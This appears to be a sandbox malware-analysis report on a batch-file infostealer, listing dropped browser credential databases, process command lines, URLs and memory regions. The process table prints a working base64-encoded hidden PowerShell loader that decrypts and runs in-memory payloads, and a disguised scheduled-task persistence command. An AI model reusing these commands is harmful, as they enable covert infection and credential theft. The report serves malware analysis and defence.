Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
1.bat
|
ASCII text, with very long lines (65187), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Costura\492059BB4ED4FD9BB5CC046DCF3C0FA2\64\sqlite.interop.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\strt.cmd
|
ASCII text, with very long lines (65187), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Bsizous.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8,
version-valid-for 7
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cakcuofd.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie
0x21, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Eiynan.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Fzqwfltzgl.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Gaprkc.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Geuchzibce.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie
0xe, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Jwukkmt.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Koxxepebyr.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Nbpzr.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Nsruehpvci.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8,
version-valid-for 4
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Ofjjkweg.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Reohbzdkbr\v6zchhhv.default-release\cert9.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie
0x5, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Reohbzdkbr\v6zchhhv.default-release\key4.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie
0x6, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Uhcsrgmszip.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie
0x21, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Wgqefurau.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Xjxdneo.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1m5cahy3.j3f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cgvjsnr.nip.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ieukqyq.n4i.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ck0uu4c.0qh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5c0xao.b1h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3l0thax.ts5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ary5eerm.kl1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqxonrgg.vq4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyohms1h.4lg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2amqgn1.z25.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0tcw4zq.n0h.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1y2k5p5.rix.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2t3qxb3.ywa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh5pvpuq.5xb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw1qska5.20k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lk10gypr.yro.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pukzw0g0.dio.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4gkcsjc.0yl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc5mpafw.rzd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv0mjcni.0xg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjixl42v.oqi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdrjgsjd.mqo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usudjiyt.yov.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycm5sxk4.1tu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with very long lines (1840), with CRLF line terminators
|
dropped
|
There are 39 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.bat" "
|
||
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\1.bat"
|
||
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7')))
"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join
'').Contains('C:\Users\user\Desktop\1')
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger
-AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\strt.cmd"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\strt.cmd"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\strt.cmd"
|
||
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7')))
"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join
'').Contains('C:\Users\user\AppData\Roaming\strt')
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger
-AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 17 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://www.microsoft.1
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://crl.microsQ
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://www.micom/pkiops/Docs/ry.htm0
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://www.sqlite.org/copyright.html2
|
unknown
|
||
http://wicroft.com
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
http://crl.microsoftS
|
unknown
|
||
http://www.microsoft.b
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://www.microsoft.c
|
unknown
|
||
https://system.data.sqlite.org/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
https://oneget.org
|
unknown
|
There are 32 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
108.190.12.0.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
95.164.10.214
|
unknown
|
Gibraltar
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C31943B000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
6C71C73000
|
stack
|
page read and write
|
||
7FF84918C000
|
trusted library allocation
|
page read and write
|
||
7FF849112000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
2B022767000
|
heap
|
page read and write
|
||
1D90110E000
|
trusted library allocation
|
page read and write
|
||
201456DF000
|
trusted library allocation
|
page read and write
|
||
72CACFE000
|
stack
|
page read and write
|
||
7FF849043000
|
trusted library allocation
|
page read and write
|
||
1D901691000
|
trusted library allocation
|
page read and write
|
||
205CFBE0000
|
heap
|
page execute and read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
1D974B4A000
|
heap
|
page read and write
|
||
7DF4097D0000
|
trusted library allocation
|
page execute and read and write
|
||
1C30779C000
|
heap
|
page read and write
|
||
CE12D8B000
|
stack
|
page read and write
|
||
2014566A000
|
trusted library allocation
|
page read and write
|
||
2B03AE16000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7FF8492B0000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
201456AE000
|
trusted library allocation
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
197B9BE000
|
stack
|
page read and write
|
||
19DA2CE000
|
stack
|
page read and write
|
||
2015C5EC000
|
heap
|
page read and write
|
||
205B5C50000
|
trusted library allocation
|
page read and write
|
||
1C307756000
|
heap
|
page read and write
|
||
E06657A000
|
stack
|
page read and write
|
||
1D97525F000
|
heap
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1D900E07000
|
trusted library allocation
|
page read and write
|
||
2B032C45000
|
trusted library allocation
|
page read and write
|
||
2069D000000
|
heap
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
1C321C02000
|
heap
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
1C321B52000
|
heap
|
page read and write
|
||
1C3217F0000
|
heap
|
page read and write
|
||
E066677000
|
stack
|
page read and write
|
||
205B7A4E000
|
trusted library allocation
|
page read and write
|
||
19D96FE000
|
stack
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
2014511D000
|
trusted library allocation
|
page read and write
|
||
1784FEB0000
|
heap
|
page read and write
|
||
1D972CC0000
|
heap
|
page read and write
|
||
1D972AFA000
|
heap
|
page read and write
|
||
1D975313000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
201459F3000
|
trusted library allocation
|
page read and write
|
||
205B5CA5000
|
heap
|
page read and write
|
||
205B5920000
|
heap
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
1D901649000
|
trusted library allocation
|
page read and write
|
||
1D91007F000
|
trusted library allocation
|
page read and write
|
||
2B0244A6000
|
trusted library allocation
|
page read and write
|
||
1784FEC1000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
2014512E000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
2B03B3F8000
|
heap
|
page read and write
|
||
1C321A70000
|
heap
|
page read and write
|
||
201455D9000
|
trusted library allocation
|
page read and write
|
||
1D972CC7000
|
heap
|
page read and write
|
||
20143C60000
|
heap
|
page read and write
|
||
1C3218A0000
|
heap
|
page read and write
|
||
1D972AF4000
|
heap
|
page read and write
|
||
2015C9B2000
|
heap
|
page read and write
|
||
1D900084000
|
trusted library allocation
|
page read and write
|
||
1C30775E000
|
heap
|
page read and write
|
||
2015C61C000
|
heap
|
page read and write
|
||
197B779000
|
stack
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
205B91D2000
|
trusted library allocation
|
page read and write
|
||
20143C65000
|
heap
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
197BA36000
|
stack
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page execute and read and write
|
||
1785FED0000
|
trusted library allocation
|
page read and write
|
||
1784DFBF000
|
heap
|
page read and write
|
||
1D974D78000
|
heap
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
7DF48D820000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849203000
|
trusted library allocation
|
page read and write
|
||
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
2B020E90000
|
trusted library section
|
page read and write
|
||
20142180000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
2B032C39000
|
trusted library allocation
|
page read and write
|
||
2069D00F000
|
heap
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
6C72DCF000
|
stack
|
page read and write
|
||
1784FD90000
|
heap
|
page execute and read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
1D974520000
|
heap
|
page execute and read and write
|
||
20143C74000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
1C3193A1000
|
trusted library allocation
|
page read and write
|
||
2015C98C000
|
heap
|
page read and write
|
||
20154114000
|
trusted library allocation
|
page read and write
|
||
205B59B6000
|
heap
|
page read and write
|
||
7FF849175000
|
trusted library allocation
|
page read and write
|
||
1784FFD3000
|
trusted library allocation
|
page read and write
|
||
1D974BF0000
|
heap
|
page read and write
|
||
205C7B89000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849172000
|
trusted library allocation
|
page read and write
|
||
2B03AE5E000
|
heap
|
page read and write
|
||
1D901798000
|
trusted library allocation
|
page read and write
|
||
2015C6A5000
|
heap
|
page read and write
|
||
20144FDB000
|
trusted library allocation
|
page read and write
|
||
1C321BFA000
|
heap
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2015CA12000
|
heap
|
page read and write
|
||
201455A7000
|
trusted library allocation
|
page read and write
|
||
1D900FAD000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
205C78A0000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
201421B0000
|
heap
|
page read and write
|
||
1784E130000
|
heap
|
page read and write
|
||
2B023ADA000
|
trusted library allocation
|
page read and write
|
||
2B020EE5000
|
heap
|
page read and write
|
||
1C309390000
|
heap
|
page execute and read and write
|
||
2015C3C5000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
72CA87E000
|
stack
|
page read and write
|
||
72CA3DF000
|
stack
|
page read and write
|
||
2B03B0A4000
|
heap
|
page read and write
|
||
1D901ADC000
|
trusted library allocation
|
page read and write
|
||
1C321EB8000
|
heap
|
page read and write
|
||
